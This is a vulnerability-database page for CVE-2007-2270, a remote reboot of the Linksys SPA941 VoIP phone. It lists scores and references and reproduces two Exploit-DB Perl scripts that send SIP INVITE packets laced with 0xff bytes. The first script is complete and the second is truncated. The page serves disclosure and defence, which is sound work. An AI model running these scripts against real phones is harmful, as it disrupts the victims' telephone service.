CVE-2007-2270
published 2007-04-25CVE-2007-2270: The Linksys SPA941 VoIP Phone allows remote attackers to cause a denial of service (device reboot) via a 0377 (0xff) character in the From header, and possibly…
PriorityP337high7.8CVSS 2.0
AVNACLAuNCNINAC
EXPLOIT
EPSS
9.36%
94.8th percentile
The Linksys SPA941 VoIP Phone allows remote attackers to cause a denial of service (device reboot) via a 0377 (0xff) character in the From header, and possibly certain other locations, in a SIP INVITE request.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Linksys SPA941 - '\377' Character Remote Denial of Service
exploitdb·2007-04-24
CVE-2007-2270 Linksys SPA941 - '\377' Character Remote Denial of Service
Linksys SPA941 - '\377' Character Remote Denial of Service
---
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 " unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg =
"INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r
Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r
Max-Forwards: 70\377\r
To: lynksys \377\r
From: ;tag=00\377\r
Call-ID: tucu\@192.168.1.2\377\r
CSeq: 24865 INVITE\377\r
Contact: \377\r
Supported: 100rel\377\r
Content-Length: 0\377\r
\r\n";
$socket->send($msg);
# milw0rm.com [2007-04-24]
Exploit-DB
Linksys SPA941 - Remote Reboot (Denial of Service)
exploitdb·2007-04-24
CVE-2007-2270 Linksys SPA941 - Remote Reboot (Denial of Service)
Linksys SPA941 - Remote Reboot (Denial of Service)
---
#!/usr/bin/perl
use IO::Socket;
#die "Usage $0 " unless ($ARGV[2]);
die "Usage $0 " unless ($ARGV[0]);
my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp');
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');
$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";
$msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377;tag=779\r
To: Receiver \r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 \r
Expire
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2007-April/053959.htmlhttp://secunia.com/advisories/25031http://www.securityfocus.com/bid/23619http://www.securitytracker.com/id?1017957http://www.vupen.com/english/advisories/2007/1532https://exchange.xforce.ibmcloud.com/vulnerabilities/33856https://www.exploit-db.com/exploits/3791https://www.exploit-db.com/exploits/3792http://lists.grok.org.uk/pipermail/full-disclosure/2007-April/053959.htmlhttp://secunia.com/advisories/25031http://www.securityfocus.com/bid/23619http://www.securitytracker.com/id?1017957http://www.vupen.com/english/advisories/2007/1532https://exchange.xforce.ibmcloud.com/vulnerabilities/33856https://www.exploit-db.com/exploits/3791https://www.exploit-db.com/exploits/3792
2007-04-25
Published